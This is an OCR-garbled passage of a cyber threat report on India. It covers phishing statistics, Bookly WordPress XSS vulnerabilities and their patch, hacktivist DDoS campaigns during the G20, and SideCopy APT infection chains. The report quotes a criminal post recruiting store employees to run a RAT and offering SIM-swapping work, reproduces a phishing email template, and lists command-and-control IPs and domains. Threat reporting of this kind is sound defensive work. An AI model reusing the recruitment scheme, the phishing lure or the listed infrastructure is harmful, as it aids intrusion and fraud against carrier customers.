Direct Link to the RAT Stub .exe File which You should be
able to Convince the Store Employees to Download the File
and Execute it. Monetary Compensation can be Discussed
and Agreed upon. Interested Candidates can Contact me on
my Telegram.
Also 1 am open to work with People who are into
sim-swapping, Ratting Mobile Store PC's, etc. I have FUD RAT
Stubs and looking for People who can RAT Mobile Carrier
Store PC's. Proﬁt will be Shared among us
50/50.
Aﬃliates of Threat Actors
reaching out Targets
Hello,
We received an inquiry concerning an invoice correct? I was
unable to locate your account with the information you sent
out. Could you send over the phone number or email
address attached to the account so that we can look into it
for you?
Spam Mail randomization
{Health Policy: soft copy
{Insurance Database is Updated or invoice
Phishing Hit Count for Year 2023
70000
60000
50000
40000
30000
20000
10000
0
Number
of
Attacks
60029
35375
20135 19139
34337
25881
34169
17416
27852 28992
17742 16744 16395
Oct
2022
Nov
2022
Dec
2022
Jan
2023
Feb
2023
Mar
2023
Apr
2023
May
2023
June
2023
July
2023
Aug
2023
Sept
2023
Oct
2023

58
WordPress Bookly Plugin Vulnerability:
CVE-2023- 1172 and CVE-2023-1159
A widely used WordPress plugin by over 60,000 websites is the
“WordPress Online Booking and Scheduling Plugin – Bookly”. Bookly
streamlines online bookings and automates the reservation process.
However, like many other WordPress plugins, it is vulnerable to
exploitation by attackers. It allows unauthenticated attackers to inject
malicious scripts, potentially compromising a site owner’s entire site
when they access the calendar tooltip from the plugin.
In March 2023, SEQRITE Labs uncovered two security vulnerabilities in the
Bookly plugin for WordPress impacting users worldwide.
The first vulnerability, CVE-2023-1172, is a high severity Cross-Site Scripting
flaw resulting from inadequate input sanitization and output escaping in
the full name value. Unauthorized attackers can globally exploit this,
injecting arbitrary web scripts onto pages, posing a significant risk with
every user visit.
The second vulnerability, CVE-2023-1159, classified as medium severity, is a
Cross-Site Scripting issue stemming from insufficient input sanitization and
output escaping in the 'Service Title' field. Authenticated attackers with
administrative privileges can leverage this vulnerability in multisite
installations or where the "unfiltered_html" feature is disabled. They can
insert web scripts into pages, which execute when users access the
affected pages.
Both vulnerabilities have a global reach, with CVE-2023-1172 being of
higher severity, emphasizing the critical need for users to address these
security concerns promptly.
Research discovered that the Bookly plugin’s “Full name” field was
vulnerable to stored cross-site scripting (XSS) attacks. The plugin reuses
the user’s “Full name” input in multiple files, significantly increasing the risk
of security breaches if the input is not properly sanitized and escaped to
prevent malicious code injection.
The vulnerability has been fully resolved in plugin version 21.5.1. It is strongly recommended that WordPress site owners update their site to the latest
patched version of the plugin (currently version 21.6 at the time of writing) to prevent potential attacks.
Criticality: High
Sectors Targeted: All
Countries Affected: Worldwide

59
return self::stringify( self::tokenize($text ), $codes, $bold, Sexclude ); return self: :stringify( self::tokenize($text ), $codes, $bold, $exclude, Sescape );
public static function stringify( $tokens, $codes, $bold, Sexclude = array(), $escape = false )
$code = self:: get ( $token[1], $codes );
$data = Sescape ? strip tags( $code ) : $code;
* @param bool Sescape
public static function stringify ( $tokens, $codes, $bold, Sexclude = array) )
$data = self:: get( $token[1], $codes );
RESOLVING THE ISSUE: A LOOK AT THE PATCH

60
Multiple Hacktivist groups
target India during the G20
Summit
Hacktivist groups from neighbouring countries had announced plans to attack websites of private and public entities in India during the G20 Summit. More
than 30 hacktivist groups targeted around 600+ government and private entities through DDoS attacks, defacements, and data leaks.
The most targeted sectors were government, followed by ﬁnance, technology, public, and education industries. Similar coordinated attacks are anticipated
next year during India’s General Elections, Paris Olympics, etc.
Number
of
Attacks
Daily Attacks Timeline
54
08/09/2023 09/09/2023 10/09/2023
152
213
250
200
150
100
50
0
DATES INDICATING RISE IN NUMBER OF ATTACKS DURING THE G20 SUMMIT

61
200
180
160
140
120
100
80
60
40
20
0
B
l
a
c
k
S
h
i
n
c
h
a
n
X
X
X
C
y
b
e
r
E
r
r
o
r
S
y
s
t
e
m
J
a
t
e
n
g
C
y
b
e
r
T
e
a
m
J
a
r
i
n
g
S
G
C
y
b
e
r
R
e
g
i
m
e
n
t
R
o
o
t
T
e
a
m
H
a
c
k
t
i
v
i
s
t
I
n
d
o
n
e
s
i
a
G
a
n
o
s
e
c
T
e
a
m
T
e
a
m
I
n
s
a
n
e
p
k
H
i
z
b
u
l
l
a
h
C
y
b
e
r
T
e
a
m
Number
of
Attacks
Number of Attacks
HACKTIVIST ORGANISATION NAME
4 4 6 7
15 16 22
43
75
176
Attacks by Top 10 Hacktivists

62
Decoding the Dynamics of
Advanced Persistent Threats
Advanced Persistent Threat (APT) groups stand out due to their sophisti-
cated techniques and specific target. This section outlines key details
about prevalent APTs, expanding on their tactics and targets.
SideCopy: Initiating Complex Chains of Infection
Description: SideCopy, distinguishes itself by distributing its own
malware. The group employs a nuanced approach, often initiating
attacks through malicious LNK files. These files set off a sophisticated
chain of infection, leveraging multiple HTAs and loader DLLs, ultimately
culminating in the deployment of final payloads.
Target: SideCopy primarily targets Telecom, Power, and Finance
sectors, showcasing a strategic focus on critical infrastructure and
financial entities.
Transparent Tribe: Evolving Scope and Strategic Campaigns
Description: Transparent Tribe is an APT group traditionally
concentrated on Indian defence ecosystem. However, it is now
targeting educational institutions and students in the Indian
subcontinent. The group's malware arsenal includes the Crimson
RAT, a consistent tool in its campaigns.
Target: Transparent Tribe has its sights national information
assets showcasing a multifaceted approach that encompasses
government and critical infrastructure entities.
RedFoxtrot: A Prolific Actor in Asian Cyber Espionage
Description: RedFoxtrot, active since at least 2014, specializes in
targeting government and telecom sectors across Asian countries.
Target: RedFoxtrot predominantly focuses on Defence Institutes and
the Telecom Sector, aligning its activities with geopolitical developments.

63
Depicting SideCopy - Infection chain-1 with
the same IP
Depicting SideCopy - Infection chain-2 with
IP sharing with domains and C2
ssynergy.in
April
Same Name
Diﬀerent Payloads
162.241.85.104
161.97.151.200
Phishing
May
October August
elﬁnindia.com
suntireclooal.n
Homosexuality-
Indian Armed Forces
Runs preBOTHta
in-memory
Stager Ares RAT
Decoy
Download
as PDF as PDF
occoman.com
Homosexuality-
Indian Armed Forces
7015
Similar
Naming
103.76.231.95
38.242.220.166
38.242.149.89
Phishing
October August
rockwellroyalhomes.com
DocScanner_Oct
CVE-2023-38831
Runs DLL
in-memory
DRat
AllaKore RAT
Ares RAT
Decoy
Decoy
as PDF as PDF
isometricsindia.co.in
Decoy
DocScanner_Aug_2023
9012
9828
61101
Shortcut Stager
HTA

64
Depicting SideCopy: Double Action, Triple Infection, and a New RAT
elﬁnindia.com
cdrzip.exe
cridviz.exe
RAR1
Shortcut as DOCX
Remote HTA 1 (Stage-1)
Runs in-memory
Runs in-memory
copies credwiz.exe and executes
Side-loading
Side-loading
in-memory
%Public%cdnews
persistence
%Temp%
Startup
Hosted
Payloads
C2
144.126.143.138
C2
209.126.7.8
preBotHta.Dll (stage-1)
RAT
preBotHta.dull (Stage-2)
Action RAT (DUser.dlI)
Decoy ﬁles
RAR2 RAR3
Shortcut as PNG Shortcut as PDF
HTA (Stage-2)
HTA (Stage-3) PreBotHta. (Stage-3)
Action RAT
(DUser.dll - 2)
PNG
Port 8080
Port
9813
Port
9467
%Public%zxbrp
LNK

India Cyber Threat Report of 2024 with year

India Cyber Threat Report of 2024 with year

Recommended

Recommended

More Related Content

Similar to India Cyber Threat Report of 2024 with year

Similar to India Cyber Threat Report of 2024 with year (20)

Recently uploaded

Recently uploaded (20)

India Cyber Threat Report of 2024 with year